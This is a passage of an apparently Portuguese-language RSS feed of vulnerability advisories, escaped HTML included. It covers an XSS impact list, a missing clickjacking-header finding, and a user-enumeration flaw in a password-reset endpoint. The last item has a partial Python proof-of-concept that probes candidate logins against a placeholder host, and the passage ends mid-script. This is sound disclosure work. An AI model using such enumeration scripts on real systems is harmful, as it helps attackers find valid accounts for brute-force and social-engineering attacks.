class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9107/image.png&amp;#34;
	width=&amp;#34;861&amp;#34;
	height=&amp;#34;1054&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9107/image_hu_8aadeff40c8f3d51.png 480w, /p/cve-2025-9107/image_hu_3012aeb2aec1845.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;81&amp;#34;
		data-flex-basis=&amp;#34;196px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9107.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9108</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9108/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9108/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9108-cabeçalhos-x-frame-options-ou-content-security-policy-ausentes&amp;#34;&amp;gt;CVE-2025-9108: Cabeçalhos &amp;lt;code&amp;gt;X-Frame-Options&amp;lt;/code&amp;gt; ou &amp;lt;code&amp;gt;Content-Security-Policy&amp;lt;/code&amp;gt; ausentes
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não implementa mecanismos de proteção contra &amp;lt;code&amp;gt;Clickjacking&amp;lt;/code&amp;gt;. Isso permite que páginas legítimas sejam incorporadas em iframes maliciosos, levando os usuários a interagir com elementos invisíveis ou disfarçados, o que pode resultar em sequestro de sessão, ações não intencionais e outros ataques.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;https://x.x.x.x/login&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A resposta HTTP da página não inclui os seguintes cabeçalhos:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;X-Frame-Options&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Content-Security-Policy: frame-ancestors &amp;#39;none&amp;#39;;&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9108-cabeçalhos-x-frame-options-ou-content-security-policy-ausentes&amp;#34;&amp;gt;CVE-2025-9108: Cabeçalhos &amp;lt;code&amp;gt;X-Frame-Options&amp;lt;/code&amp;gt; ou &amp;lt;code&amp;gt;Content-Security-Policy&amp;lt;/code&amp;gt; ausentes
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9108&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não implementa mecanismos de proteção contra &amp;lt;code&amp;gt;Clickjacking&amp;lt;/code&amp;gt;. Isso permite que páginas legítimas sejam incorporadas em iframes maliciosos, levando os usuários a interagir com elementos invisíveis ou disfarçados, o que pode resultar em sequestro de sessão, ações não intencionais e outros ataques.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;https://x.x.x.x/login&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A resposta HTTP da página não inclui os seguintes cabeçalhos:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;X-Frame-Options&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Content-Security-Policy: frame-ancestors &amp;#39;none&amp;#39;;&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Resposta HTTP do aplicativo:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;...
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Missing Headers:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Frame-Options
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Security-Policy: frame-ancestors &amp;amp;#39;none&amp;amp;#39;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Essa ausência permite que o aplicativo seja incorporado a elementos &amp;lt;code&amp;gt;iframe&amp;lt;/code&amp;gt; em sites de terceiros.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Execução de ações não autorizadas: Os invasores podem induzir os usuários a clicar em botões ou links ocultos, executando ações críticas sem o seu consentimento.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Um clique disfarçado pode levar os usuários a inserir informações confidenciais, como logins e senhas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Transferência de fundos ou compras não autorizadas: Os usuários podem ser induzidos a autorizar transações financeiras em sites bancários ou de comércio eletrônico.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Alteração das configurações da conta: Os invasores podem explorar o clickjacking para induzir as vítimas a desabilitar recursos de segurança ou alterar e-mails de recuperação.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Instalação de malware: Cliques manipulados podem iniciar o download de arquivos maliciosos sem o conhecimento do usuário.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios: Em aplicativos administrativos, uma Um clique pode conceder acesso elevado a invasores.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confiança: O impacto psicológico e reputacional na organização pode ser significativo, pois os usuários percebem o site como inseguro.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://vuldb.com/?submit.627923&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://vuldb.com/?submit.627923&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/vanderlei50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/vanderlei-princival/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vanderlei Princival&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 18 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9109</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9109/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9109/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9109-a-vulnerabilidade-de-enumeração-de-usuários-foi-identificada-na-funcionalidade-esqueceu-a-senha&amp;#34;&amp;gt;CVE-2025-9109: A vulnerabilidade de enumeração de usuários foi identificada na funcionalidade &amp;lt;code&amp;gt;Esqueceu a senha&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Enumeração de Usuários foi identificada na funcionalidade &amp;lt;code&amp;gt;Esqueceu a Senha&amp;lt;/code&amp;gt;. O sistema responde de forma diferente dependendo se o nome de usuário enviado existe, permitindo que um invasor enumere contas de usuário válidas. Isso pode auxiliar em ataques de força bruta direcionados ou campanhas de engenharia social.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9109-a-vulnerabilidade-de-enumeração-de-usuários-foi-identificada-na-funcionalidade-esqueceu-a-senha&amp;#34;&amp;gt;CVE-2025-9109: A vulnerabilidade de enumeração de usuários foi identificada na funcionalidade &amp;lt;code&amp;gt;Esqueceu a senha&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9109&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Enumeração de Usuários foi identificada na funcionalidade &amp;lt;code&amp;gt;Esqueceu a Senha&amp;lt;/code&amp;gt;. O sistema responde de forma diferente dependendo se o nome de usuário enviado existe, permitindo que um invasor enumere contas de usuário válidas. Isso pode auxiliar em ataques de força bruta direcionados ou campanhas de engenharia social.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Ao enviar uma solicitação POST para o endpoint &amp;lt;code&amp;gt;/password/email&amp;lt;/code&amp;gt;, o sistema retorna respostas diferentes com base na correspondência do parâmetro de login fornecido com um usuário existente.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Por exemplo:&amp;lt;/br&amp;gt;&amp;lt;li&amp;gt;Se o usuário &amp;lt;b&amp;gt;existir&amp;lt;/b&amp;gt;: a resposta contém uma mensagem como: &amp;#34;Um link de redefinição de senha foi enviado&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Se o usuário &amp;lt;b&amp;gt;não existir&amp;lt;/b&amp;gt;: a resposta contém uma mensagem como: &amp;#34;Não conseguimos encontrar um usuário com esse login&amp;#34;.&amp;lt;/li&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esse comportamento permite que um invasor determine quais nomes de usuário são válidos simplesmente automatizando solicitações com entradas diferentes. A vulnerabilidade surge da falta de uma resposta uniforme para contas válidas e inválidas durante o processo de recuperação de senha.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um script Python foi criado para demonstrar este problema:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;kn&amp;#34;&amp;gt;import&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nn&amp;#34;&amp;gt;requests&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;url&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x/password/email&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;headers&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Content-Type&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;application/x-www-form-urlencoded&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Origin&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Referer&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;http://x.x.x.x/password/reset&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;logins&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;admin&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;jose&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;maria&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;professor&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;aluno1&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;]&amp;lt;/span&amp;gt;
